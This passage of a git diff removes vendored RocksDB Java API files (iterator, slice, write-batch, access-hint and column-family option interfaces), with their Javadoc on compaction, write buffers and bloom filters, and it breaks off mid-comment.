+++ /dev/null
@@ -1,101 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Base class implementation for Rocks Iterators
- * in the Java API
- *
- * <p>Multiple threads can invoke const methods on an RocksIterator without
- * external synchronization, but if any of the threads may call a
- * non-const method, all threads accessing the same RocksIterator must use
- * external synchronization.</p>
- *
- * @param <P> The type of the Parent Object from which the Rocks Iterator was
- *          created. This is used by disposeInternal to avoid double-free
- *          issues with the underlying C++ object.
- * @see org.rocksdb.RocksObject
- */
-public abstract class AbstractRocksIterator<P extends RocksObject>
-    extends RocksObject implements RocksIteratorInterface {
-  final P parent_;
-
-  protected AbstractRocksIterator(final P parent,
-      final long nativeHandle) {
-    super(nativeHandle);
-    // parent must point to a valid RocksDB instance.
-    assert (parent != null);
-    // RocksIterator must hold a reference to the related parent instance
-    // to guarantee that while a GC cycle starts RocksIterator instances
-    // are freed prior to parent instances.
-    parent_ = parent;
-  }
-
-  @Override
-  public boolean isValid() {
-    assert (isOwningHandle());
-    return isValid0(nativeHandle_);
-  }
-
-  @Override
-  public void seekToFirst() {
-    assert (isOwningHandle());
-    seekToFirst0(nativeHandle_);
-  }
-
-  @Override
-  public void seekToLast() {
-    assert (isOwningHandle());
-    seekToLast0(nativeHandle_);
-  }
-
-  @Override
-  public void seek(byte[] target) {
-    assert (isOwningHandle());
-    seek0(nativeHandle_, target, target.length);
-  }
-
-  @Override
-  public void next() {
-    assert (isOwningHandle());
-    next0(nativeHandle_);
-  }
-
-  @Override
-  public void prev() {
-    assert (isOwningHandle());
-    prev0(nativeHandle_);
-  }
-
-  @Override
-  public void status() throws RocksDBException {
-    assert (isOwningHandle());
-    status0(nativeHandle_);
-  }
-
-  /**
-   * <p>Deletes underlying C++ iterator pointer.</p>
-   *
-   * <p>Note: the underlying handle can only be safely deleted if the parent
-   * instance related to a certain RocksIterator is still valid and initialized.
-   * Therefore {@code disposeInternal()} checks if the parent is initialized
-   * before freeing the native handle.</p>
-   */
-  @Override
-  protected void disposeInternal() {
-      if (parent_.isOwningHandle()) {
-        disposeInternal(nativeHandle_);
-      }
-  }
-
-  abstract boolean isValid0(long handle);
-  abstract void seekToFirst0(long handle);
-  abstract void seekToLast0(long handle);
-  abstract void next0(long handle);
-  abstract void prev0(long handle);
-  abstract void seek0(long handle, byte[] target, int targetLen);
-  abstract void status0(long handle) throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractSlice.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractSlice.java
deleted file mode 100644
index 5a22e29..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractSlice.java
+++ /dev/null
@@ -1,191 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Slices are used by RocksDB to provide
- * efficient access to keys and values.
- *
- * This class is package private, implementers
- * should extend either of the public abstract classes:
- *   @see org.rocksdb.Slice
- *   @see org.rocksdb.DirectSlice
- *
- * Regards the lifecycle of Java Slices in RocksDB:
- *   At present when you configure a Comparator from Java, it creates an
- *   instance of a C++ BaseComparatorJniCallback subclass and
- *   passes that to RocksDB as the comparator. That subclass of
- *   BaseComparatorJniCallback creates the Java
- *   @see org.rocksdb.AbstractSlice subclass Objects. When you dispose
- *   the Java @see org.rocksdb.AbstractComparator subclass, it disposes the
- *   C++ BaseComparatorJniCallback subclass, which in turn destroys the
- *   Java @see org.rocksdb.AbstractSlice subclass Objects.
- */
-public abstract class AbstractSlice<T> extends RocksMutableObject {
-
-  protected AbstractSlice() {
-    super();
-  }
-
-  protected AbstractSlice(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Returns the data of the slice.
-   *
-   * @return The slice data. Note, the type of access is
-   *   determined by the subclass
-   *   @see org.rocksdb.AbstractSlice#data0(long)
-   */
-  public T data() {
-    return data0(getNativeHandle());
-  }
-
-  /**
-   * Access to the data is provided by the
-   * subtype as it needs to handle the
-   * generic typing.
-   *
-   * @param handle The address of the underlying
-   *   native object.
-   *
-   * @return Java typed access to the data.
-   */
-  protected abstract T data0(long handle);
-
-  /**
-   * Drops the specified {@code n}
-   * number of bytes from the start
-   * of the backing slice
-   *
-   * @param n The number of bytes to drop
-   */
-  public abstract void removePrefix(final int n);
-
-  /**
-   * Clears the backing slice
-   */
-  public abstract void clear();
-
-  /**
-   * Return the length (in bytes) of the data.
-   *
-   * @return The length in bytes.
-   */
-  public int size() {
-    return size0(getNativeHandle());
-  }
-
-  /**
-   * Return true if the length of the
-   * data is zero.
-   *
-   * @return true if there is no data, false otherwise.
-   */
-  public boolean empty() {
-    return empty0(getNativeHandle());
-  }
-
-  /**
-   * Creates a string representation of the data
-   *
-   * @param hex When true, the representation
-   *   will be encoded in hexadecimal.
-   *
-   * @return The string representation of the data.
-   */
-  public String toString(final boolean hex) {
-    return toString0(getNativeHandle(), hex);
-  }
-
-  @Override
-  public String toString() {
-    return toString(false);
-  }
-
-  /**
-   * Three-way key comparison
-   *
-   *  @param other A slice to compare against
-   *
-   *  @return Should return either:
-   *    1) &lt; 0 if this &lt; other
-   *    2) == 0 if this == other
-   *    3) &gt; 0 if this &gt; other
-   */
-  public int compare(final AbstractSlice<?> other) {
-    assert (other != null);
-    if(!isOwningHandle()) {
-      return other.isOwningHandle() ? -1 : 0;
-    } else {
-      if(!other.isOwningHandle()) {
-        return 1;
-      } else {
-        return compare0(getNativeHandle(), other.getNativeHandle());
-      }
-    }
-  }
-
-  @Override
-  public int hashCode() {
-    return toString().hashCode();
-  }
-
-  /**
-   * If other is a slice object, then
-   * we defer to {@link #compare(AbstractSlice) compare}
-   * to check equality, otherwise we return false.
-   *
-   * @param other Object to test for equality
-   *
-   * @return true when {@code this.compare(other) == 0},
-   *   false otherwise.
-   */
-  @Override
-  public boolean equals(final Object other) {
-    if (other != null && other instanceof AbstractSlice) {
-      return compare((AbstractSlice<?>)other) == 0;
-    } else {
-      return false;
-    }
-  }
-
-  /**
-   * Determines whether this slice starts with
-   * another slice
-   *
-   * @param prefix Another slice which may of may not
-   *   be a prefix of this slice.
-   *
-   * @return true when this slice starts with the
-   *   {@code prefix} slice
-   */
-  public boolean startsWith(final AbstractSlice<?> prefix) {
-    if (prefix != null) {
-      return startsWith0(getNativeHandle(), prefix.getNativeHandle());
-    } else {
-      return false;
-    }
-  }
-
-  protected native static long createNewSliceFromString(final String str);
-  private native int size0(long handle);
-  private native boolean empty0(long handle);
-  private native String toString0(long handle, boolean hex);
-  private native int compare0(long handle, long otherHandle);
-  private native boolean startsWith0(long handle, long otherHandle);
-
-  /**
-   * Deletes underlying C++ slice pointer.
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the slice are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected final native void disposeInternal(final long handle);
-
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractWriteBatch.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractWriteBatch.java
deleted file mode 100644
index b2e5571..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractWriteBatch.java
+++ /dev/null
@@ -1,119 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public abstract class AbstractWriteBatch extends RocksObject
-    implements WriteBatchInterface {
-
-  protected AbstractWriteBatch(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  @Override
-  public int count() {
-    return count0(nativeHandle_);
-  }
-
-  @Override
-  public void put(byte[] key, byte[] value) {
-    put(nativeHandle_, key, key.length, value, value.length);
-  }
-
-  @Override
-  public void put(ColumnFamilyHandle columnFamilyHandle, byte[] key,
-      byte[] value) {
-    put(nativeHandle_, key, key.length, value, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  @Override
-  public void merge(byte[] key, byte[] value) {
-    merge(nativeHandle_, key, key.length, value, value.length);
-  }
-
-  @Override
-  public void merge(ColumnFamilyHandle columnFamilyHandle, byte[] key,
-      byte[] value) {
-    merge(nativeHandle_, key, key.length, value, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  @Override
-  public void remove(byte[] key) {
-    remove(nativeHandle_, key, key.length);
-  }
-
-  @Override
-  public void remove(ColumnFamilyHandle columnFamilyHandle, byte[] key) {
-    remove(nativeHandle_, key, key.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  @Override
-  public void deleteRange(byte[] beginKey, byte[] endKey) {
-    deleteRange(nativeHandle_, beginKey, beginKey.length, endKey, endKey.length);
-  }
-
-  @Override
-  public void deleteRange(ColumnFamilyHandle columnFamilyHandle, byte[] beginKey, byte[] endKey) {
-    deleteRange(nativeHandle_, beginKey, beginKey.length, endKey, endKey.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  @Override
-  public void putLogData(byte[] blob) {
-    putLogData(nativeHandle_, blob, blob.length);
-  }
-
-  @Override
-  public void clear() {
-    clear0(nativeHandle_);
-  }
-
-  @Override
-  public void setSavePoint() {
-    setSavePoint0(nativeHandle_);
-  }
-
-  @Override
-  public void rollbackToSavePoint() throws RocksDBException {
-    rollbackToSavePoint0(nativeHandle_);
-  }
-
-  abstract int count0(final long handle);
-
-  abstract void put(final long handle, final byte[] key, final int keyLen,
-      final byte[] value, final int valueLen);
-
-  abstract void put(final long handle, final byte[] key, final int keyLen,
-      final byte[] value, final int valueLen, final long cfHandle);
-
-  abstract void merge(final long handle, final byte[] key, final int keyLen,
-      final byte[] value, final int valueLen);
-
-  abstract void merge(final long handle, final byte[] key, final int keyLen,
-      final byte[] value, final int valueLen, final long cfHandle);
-
-  abstract void remove(final long handle, final byte[] key,
-      final int keyLen);
-
-  abstract void remove(final long handle, final byte[] key,
-      final int keyLen, final long cfHandle);
-
-  abstract void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen);
-
-  abstract void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen, final long cfHandle);
-
-  abstract void putLogData(final long handle, final byte[] blob,
-      final int blobLen);
-
-  abstract void clear0(final long handle);
-
-  abstract void setSavePoint0(final long handle);
-
-  abstract void rollbackToSavePoint0(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AccessHint.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AccessHint.java
deleted file mode 100644
index 877c4ab..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AccessHint.java
+++ /dev/null
@@ -1,53 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * File access pattern once a compaction has started
- */
-public enum AccessHint {
-  NONE((byte)0x0),
-  NORMAL((byte)0x1),
-  SEQUENTIAL((byte)0x2),
-  WILLNEED((byte)0x3);
-
-  private final byte value;
-
-  AccessHint(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * <p>Returns the byte value of the enumerations value.</p>
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * <p>Get the AccessHint enumeration value by
-   * passing the byte identifier to this method.</p>
-   *
-   * @param byteIdentifier of AccessHint.
-   *
-   * @return AccessHint instance.
-   *
-   * @throws IllegalArgumentException if the access hint for the byteIdentifier
-   *     cannot be found
-   */
-  public static AccessHint getAccessHint(final byte byteIdentifier) {
-    for (final AccessHint accessHint : AccessHint.values()) {
-      if (accessHint.getValue() == byteIdentifier) {
-        return accessHint;
-      }
-    }
-
-    throw new IllegalArgumentException(
-        "Illegal value provided for AccessHint.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java
deleted file mode 100644
index d3908d1..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java
+++ /dev/null
@@ -1,465 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.List;
-
-/**
- * Advanced Column Family Options which are not
- * mutable (i.e. present in {@link AdvancedMutableColumnFamilyOptionsInterface}
- *
- * Taken from include/rocksdb/advanced_options.h
- */
-public interface AdvancedColumnFamilyOptionsInterface
-    <T extends AdvancedColumnFamilyOptionsInterface> {
-
-  /**
-   * The minimum number of write buffers that will be merged together
-   * before writing to storage.  If set to 1, then
-   * all write buffers are flushed to L0 as individual files and this increases
-   * read amplification because a get request has to check in all of these
-   * files. Also, an in-memory merge may result in writing lesser
-   * data to storage if there are duplicate records in each of these
-   * individual write buffers.  Default: 1
-   *
-   * @param minWriteBufferNumberToMerge the minimum number of write buffers
-   *     that will be merged together.
-   * @return the reference to the current options.
-   */
-  T setMinWriteBufferNumberToMerge(
-      int minWriteBufferNumberToMerge);
-
-  /**
-   * The minimum number of write buffers that will be merged together
-   * before writing to storage.  If set to 1, then
-   * all write buffers are flushed to L0 as individual files and this increases
-   * read amplification because a get request has to check in all of these
-   * files. Also, an in-memory merge may result in writing lesser
-   * data to storage if there are duplicate records in each of these
-   * individual write buffers.  Default: 1
-   *
-   * @return the minimum number of write buffers that will be merged together.
-   */
-  int minWriteBufferNumberToMerge();
-
-  /**
-   * The total maximum number of write buffers to maintain in memory including
-   * copies of buffers that have already been flushed.  Unlike
-   * {@link AdvancedMutableColumnFamilyOptionsInterface#maxWriteBufferNumber()},
-   * this parameter does not affect flushing.
-   * This controls the minimum amount of write history that will be available
-   * in memory for conflict checking when Transactions are used.
-   *
-   * When using an OptimisticTransactionDB:
-   * If this value is too low, some transactions may fail at commit time due
-   * to not being able to determine whether there were any write conflicts.
-   *
-   * When using a TransactionDB:
-   * If Transaction::SetSnapshot is used, TransactionDB will read either
-   * in-memory write buffers or SST files to do write-conflict checking.
-   * Increasing this value can reduce the number of reads to SST files
-   * done for conflict detection.
-   *
-   * Setting this value to 0 will cause write buffers to be freed immediately
-   * after they are flushed.
-   * If this value is set to -1,
-   * {@link AdvancedMutableColumnFamilyOptionsInterface#maxWriteBufferNumber()}
-   * will be used.
-   *
-   * Default:
-   * If using a TransactionDB/OptimisticTransactionDB, the default value will
-   * be set to the value of
-   * {@link AdvancedMutableColumnFamilyOptionsInterface#maxWriteBufferNumber()}
-   * if it is not explicitly set by the user. Otherwise, the default is 0.
-   *
-   * @param maxWriteBufferNumberToMaintain The maximum number of write
-   *     buffers to maintain
-   *
-   * @return the reference to the current options.
-   */
-  T setMaxWriteBufferNumberToMaintain(
-      int maxWriteBufferNumberToMaintain);
-
-  /**
-   * The total maximum number of write buffers to maintain in memory including
-   * copies of buffers that have already been flushed.
-   *
-   * @return maxWriteBufferNumberToMaintain The maximum number of write buffers
-   *     to maintain
-   */
-  int maxWriteBufferNumberToMaintain();
-
-  /**
-   * Allows thread-safe inplace updates.
-   * If inplace_callback function is not set,
-   *   Put(key, new_value) will update inplace the existing_value iff
-   *   * key exists in current memtable
-   *   * new sizeof(new_value) &le; sizeof(existing_value)
-   *   * existing_value for that key is a put i.e. kTypeValue
-   * If inplace_callback function is set, check doc for inplace_callback.
-   * Default: false.
-   *
-   * @param inplaceUpdateSupport true if thread-safe inplace updates
-   *     are allowed.
-   * @return the reference to the current options.
-   */
-  T setInplaceUpdateSupport(
-      boolean inplaceUpdateSupport);
-
-  /**
-   * Allows thread-safe inplace updates.
-   * If inplace_callback function is not set,
-   *   Put(key, new_value) will update inplace the existing_value iff
-   *   * key exists in current memtable
-   *   * new sizeof(new_value) &le; sizeof(existing_value)
-   *   * existing_value for that key is a put i.e. kTypeValue
-   * If inplace_callback function is set, check doc for inplace_callback.
-   * Default: false.
-   *
-   * @return true if thread-safe inplace updates are allowed.
-   */
-  boolean inplaceUpdateSupport();
-
-  /**
-   * Control locality of bloom filter probes to improve cache miss rate.
-   * This option only applies to memtable prefix bloom and plaintable
-   * prefix bloom. It essentially limits the max number of cache lines each
-   * bloom filter check can touch.
-   * This optimization is turned off when set to 0. The number should never
-   * be greater than number of probes. This option can boost performance
-   * for in-memory workload but should use with care since it can cause
-   * higher false positive rate.
-   * Default: 0
-   *
-   * @param bloomLocality the level of locality of bloom-filter probes.
-   * @return the reference to the current options.
-   */
-  T setBloomLocality(int bloomLocality);
-
-  /**
-   * Control locality of bloom filter probes to improve cache miss rate.
-   * This option only applies to memtable prefix bloom and plaintable
-   * prefix bloom. It essentially limits the max number of cache lines each
-   * bloom filter check can touch.
-   * This optimization is turned off when set to 0. The number should never
-   * be greater than number of probes. This option can boost performance
-   * for in-memory workload but should use with care since it can cause
-   * higher false positive rate.
-   * Default: 0
-   *
-   * @return the level of locality of bloom-filter probes.
-   * @see #setBloomLocality(int)
-   */
-  int bloomLocality();
-
-  /**
-   * <p>Different levels can have different compression
-   * policies. There are cases where most lower levels
-   * would like to use quick compression algorithms while
-   * the higher levels (which have more data) use
-   * compression algorithms that have better compression
-   * but could be slower. This array, if non-empty, should
-   * have an entry for each level of the database;
-   * these override the value specified in the previous
-   * field 'compression'.</p>
-   *
-   * <strong>NOTICE</strong>
-   * <p>If {@code level_compaction_dynamic_level_bytes=true},
-   * {@code compression_per_level[0]} still determines {@code L0},
-   * but other elements of the array are based on base level
-   * (the level {@code L0} files are merged to), and may not
-   * match the level users see from info log for metadata.
-   * </p>
-   * <p>If {@code L0} files are merged to {@code level - n},
-   * then, for {@code i&gt;0}, {@code compression_per_level[i]}
-   * determines compaction type for level {@code n+i-1}.</p>
-   *
-   * <strong>Example</strong>
-   * <p>For example, if we have 5 levels, and we determine to
-   * merge {@code L0} data to {@code L4} (which means {@code L1..L3}
-   * will be empty), then the new files go to {@code L4} uses
-   * compression type {@code compression_per_level[1]}.</p>
-   *
-   * <p>If now {@code L0} is merged to {@code L2}. Data goes to
-   * {@code L2} will be compressed according to
-   * {@code compression_per_level[1]}, {@code L3} using
-   * {@code compression_per_level[2]}and {@code L4} using
-   * {@code compression_per_level[3]}. Compaction for each
-   * level can change when data grows.</p>
-   *
-   * <p><strong>Default:</strong> empty</p>
-   *
-   * @param compressionLevels list of
-   *     {@link org.rocksdb.CompressionType} instances.
-   *
-   * @return the reference to the current options.
-   */
-  T setCompressionPerLevel(
-      List<CompressionType> compressionLevels);
-
-  /**
-   * <p>Return the currently set {@link org.rocksdb.CompressionType}
-   * per instances.</p>
-   *
-   * <p>See: {@link #setCompressionPerLevel(java.util.List)}</p>
-   *
-   * @return list of {@link org.rocksdb.CompressionType}
-   *     instances.
-   */
-  List<CompressionType> compressionPerLevel();
-
-  /**
-   * Set the number of levels for this database
-   * If level-styled compaction is used, then this number determines
-   * the total number of levels.
-   *
-   * @param numLevels the number of levels.
-   * @return the reference to the current options.
-   */
-  T setNumLevels(int numLevels);
-
-  /**
-   * If level-styled compaction is used, then this number determines
-   * the total number of levels.
-   *
-   * @return the number of levels.
-   */
-  int numLevels();
-
-  /**
-   * <p>If {@code true}, RocksDB will pick target size of each level
-   * dynamically. We will pick a base level b &gt;= 1. L0 will be
-   * directly merged into level b, instead of always into level 1.
-   * Level 1 to b-1 need to be empty. We try to pick b and its target
-   * size so that</p>
-   *
-   * <ol>
-   * <li>target size is in the range of
-   *   (max_bytes_for_level_base / max_bytes_for_level_multiplier,
-   *    max_bytes_for_level_base]</li>
-   * <li>target size of the last level (level num_levels-1) equals to extra size
-   *    of the level.</li>
-   * </ol>
-   *
-   * <p>At the same time max_bytes_for_level_multiplier and
-   * max_bytes_for_level_multiplier_additional are still satisfied.</p>
-   *
-   * <p>With this option on, from an empty DB, we make last level the base
-   * level, which means merging L0 data into the last level, until it exceeds
-   * max_bytes_for_level_base. And then we make the second last level to be
-   * base level, to start to merge L0 data to second last level, with its
-   * target size to be {@code 1/max_bytes_for_level_multiplier} of the last
-   * levels extra size. After the data accumulates more so that we need to
-   * move the base level to the third last one, and so on.</p>
-   *
-   * <h2>Example</h2>
-   * <p>For example, assume {@code max_bytes_for_level_multiplier=10},
-   * {@code num_levels=6}, and {@code max_bytes_for_level_base=10MB}.</p>
-   *
-   * <p>Target sizes of level 1 to 5 starts with:</p>
-   * {@code [- - - - 10MB]}
-   * <p>with base level is level. Target sizes of level 1 to 4 are not applicable
-   * because they will not be used.
-   * Until the size of Level 5 grows to more than 10MB, say 11MB, we make
-   * base target to level 4 and now the targets looks like:</p>
-   * {@code [- - - 1.1MB 11MB]}
-   * <p>While data are accumulated, size targets are tuned based on actual data
-   * of level 5. When level 5 has 50MB of data, the target is like:</p>
-   * {@code [- - - 5MB 50MB]}
-   * <p>Until level 5's actual size is more than 100MB, say 101MB. Now if we
-   * keep level 4 to be the base level, its target size needs to be 10.1MB,
-   * which doesn't satisfy the target size range. So now we make level 3
-   * the target size and the target sizes of the levels look like:</p>
-   * {@code [- - 1.01MB 10.1MB 101MB]}
-   * <p>In the same way, while level 5 further grows, all levels' targets grow,
-   * like</p>
-   * {@code [- - 5MB 50MB 500MB]}
-   * <p>Until level 5 exceeds 1000MB and becomes 1001MB, we make level 2 the
-   * base level and make levels' target sizes like this:</p>
-   * {@code [- 1.001MB 10.01MB 100.1MB 1001MB]}
-   * <p>and go on...</p>
-   *
-   * <p>By doing it, we give {@code max_bytes_for_level_multiplier} a priority
-   * against {@code max_bytes_for_level_base}, for a more predictable LSM tree
-   * shape. It is useful to limit worse case space amplification.</p>
-   *
-   * <p>{@code max_bytes_for_level_multiplier_additional} is ignored with
-   * this flag on.</p>
-   *
-   * <p>Turning this feature on or off for an existing DB can cause unexpected
-   * LSM tree structure so it's not recommended.</p>
-   *
-   * <p><strong>Caution</strong>: this option is experimental</p>
-   *
-   * <p>Default: false</p>
-   *
-   * @param enableLevelCompactionDynamicLevelBytes boolean value indicating
-   *     if {@code LevelCompactionDynamicLevelBytes} shall be enabled.
-   * @return the reference to the current options.
-   */
-  @Experimental("Turning this feature on or off for an existing DB can cause" +
-      "unexpected LSM tree structure so it's not recommended")
-  T setLevelCompactionDynamicLevelBytes(
-      boolean enableLevelCompactionDynamicLevelBytes);
-
-  /**
-   * <p>Return if {@code LevelCompactionDynamicLevelBytes} is enabled.
-   * </p>
-   *
-   * <p>For further information see
-   * {@link #setLevelCompactionDynamicLevelBytes(boolean)}</p>
-   *
-   * @return boolean value indicating if
-   *    {@code levelCompactionDynamicLevelBytes} is enabled.
-   */
-  @Experimental("Caution: this option is experimental")
-  boolean levelCompactionDynamicLevelBytes();
-
-  /**
-   * Maximum size of each compaction (not guarantee)
-   *
-   * @param maxCompactionBytes the compaction size limit
-   * @return the reference to the current options.
-   */
-  T setMaxCompactionBytes(
-      long maxCompactionBytes);
-
-  /**
-   * Control maximum size of each compaction (not guaranteed)
-   *
-   * @return compaction size threshold
-   */
-  long maxCompactionBytes();
-
-  /**
-   * Set compaction style for DB.
-   *
-   * Default: LEVEL.
-   *
-   * @param compactionStyle Compaction style.
-   * @return the reference to the current options.
-   */
-  ColumnFamilyOptionsInterface setCompactionStyle(
-      CompactionStyle compactionStyle);
-
-  /**
-   * Compaction style for DB.
-   *
-   * @return Compaction style.
-   */
-  CompactionStyle compactionStyle();
-
-  /**
-   * If level {@link #compactionStyle()} == {@link CompactionStyle#LEVEL},
-   * for each level, which files are prioritized to be picked to compact.
-   *
-   * Default: {@link CompactionPriority#ByCompensatedSize}
-   *
-   * @param compactionPriority The compaction priority
-   *
-   * @return the reference to the current options.
-   */
-  T setCompactionPriority(
-      CompactionPriority compactionPriority);
-
-  /**
-   * Get the Compaction priority if level compaction
-   * is used for all levels
-   *
-   * @return The compaction priority
-   */
-  CompactionPriority compactionPriority();
-
-  /**
-   * Set the options needed to support Universal Style compactions
-   *
-   * @param compactionOptionsUniversal The Universal Style compaction options
-   *
-   * @return the reference to the current options.
-   */
-  T setCompactionOptionsUniversal(
-      CompactionOptionsUniversal compactionOptionsUniversal);
-
-  /**
-   * The options needed to support Universal Style compactions
-   *
-   * @return The Universal Style compaction options
-   */
-  CompactionOptionsUniversal compactionOptionsUniversal();
-
-  /**
-   * The options for FIFO compaction style
-   *
-   * @param compactionOptionsFIFO The FIFO compaction options
-   *
-   * @return the reference to the current options.
-   */
-  T setCompactionOptionsFIFO(
-      CompactionOptionsFIFO compactionOptionsFIFO);
-
-  /**
-   * The options for FIFO compaction style
-   *
-   * @return The FIFO compaction options
-   */
-  CompactionOptionsFIFO compactionOptionsFIFO();
-
-  /**
-   * <p>This flag specifies that the implementation should optimize the filters
-   * mainly for cases where keys are found rather than also optimize for keys
-   * missed. This would be used in cases where the application knows that
-   * there are very few misses or the performance in the case of misses is not
-   * important.</p>
-   *
-   * <p>For now, this flag allows us to not store filters for the last level i.e
-   * the largest level which contains data of the LSM store. For keys which
-   * are hits, the filters in this level are not useful because we will search
-   * for the data anyway.</p>
-   *
-   * <p><strong>NOTE</strong>: the filters in other levels are still useful
-   * even for key hit because they tell us whether to look in that level or go
-   * to the higher level.</p>
-   *
-   * <p>Default: false<p>
-   *
-   * @param optimizeFiltersForHits boolean value indicating if this flag is set.
-   * @return the reference to the current options.
-   */
-  T setOptimizeFiltersForHits(
-      boolean optimizeFiltersForHits);
-
-  /**
-   * <p>Returns the current state of the {@code optimize_filters_for_hits}
-   * setting.</p>
-   *
-   * @return boolean value indicating if the flag
-   *     {@code optimize_filters_for_hits} was set.
-   */
-  boolean optimizeFiltersForHits();
-
-  /**
-   * In debug mode, RocksDB run consistency checks on the LSM everytime the LSM
-   * change (Flush, Compaction, AddFile). These checks are disabled in release
-   * mode, use this option to enable them in release mode as well.
-   *
-   * Default: false
-   *
-   * @param forceConsistencyChecks true to force consistency checks
-   *
-   * @return the reference to the current options.
-   */
-  T setForceConsistencyChecks(
-      boolean forceConsistencyChecks);
-
-  /**
-   * In debug mode, RocksDB run consistency checks on the LSM everytime the LSM
-   * change (Flush, Compaction, AddFile). These checks are disabled in release
-   * mode.
-   *
-   * @return true if consistency checks are enforced
-   */
-  boolean forceConsistencyChecks();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java
deleted file mode 100644
index 092fe37..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java
+++ /dev/null
@@ -1,437 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Advanced Column Family Options which are mutable
- *
- * Taken from include/rocksdb/advanced_options.h
- * and MutableCFOptions in util/cf_options.h
- */
-public interface AdvancedMutableColumnFamilyOptionsInterface
-    <T extends AdvancedMutableColumnFamilyOptionsInterface> {
-
-  /**
-   * The maximum number of write buffers that are built up in memory.
-   * The default is 2, so that when 1 write buffer is being flushed to
-   * storage, new writes can continue to the other write buffer.
-   * Default: 2
-   *
-   * @param maxWriteBufferNumber maximum number of write buffers.
-   * @return the instance of the current options.
-   */
-  T setMaxWriteBufferNumber(
-      int maxWriteBufferNumber);
-
-  /**
-   * Returns maximum number of write buffers.
-   *
-   * @return maximum number of write buffers.
-   * @see #setMaxWriteBufferNumber(int)
-   */
-  int maxWriteBufferNumber();
-
-  /**
-   * Number of locks used for inplace update
-   * Default: 10000, if inplace_update_support = true, else 0.
-   *
-   * @param inplaceUpdateNumLocks the number of locks used for
-   *     inplace updates.
-   * @return the reference to the current options.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *     while overflowing the underlying platform specific value.
-   */
-  T setInplaceUpdateNumLocks(
-      long inplaceUpdateNumLocks);
-
-  /**
-   * Number of locks used for inplace update
-   * Default: 10000, if inplace_update_support = true, else 0.
-   *
-   * @return the number of locks used for inplace update.
-   */
-  long inplaceUpdateNumLocks();
-
-  /**
-   * if prefix_extractor is set and memtable_prefix_bloom_size_ratio is not 0,
-   * create prefix bloom for memtable with the size of
-   * write_buffer_size * memtable_prefix_bloom_size_ratio.
-   * If it is larger than 0.25, it is santinized to 0.25.
-   *
-   * Default: 0 (disable)
-   *
-   * @param memtablePrefixBloomSizeRatio The ratio
-   * @return the reference to the current options.
-   */
-  T setMemtablePrefixBloomSizeRatio(
-      double memtablePrefixBloomSizeRatio);
-
-  /**
-   * if prefix_extractor is set and memtable_prefix_bloom_size_ratio is not 0,
-   * create prefix bloom for memtable with the size of
-   * write_buffer_size * memtable_prefix_bloom_size_ratio.
-   * If it is larger than 0.25, it is santinized to 0.25.
-   *
-   * Default: 0 (disable)
-   *
-   * @return the ratio
-   */
-  double memtablePrefixBloomSizeRatio();
-
-  /**
-   * Page size for huge page TLB for bloom in memtable. If &le; 0, not allocate
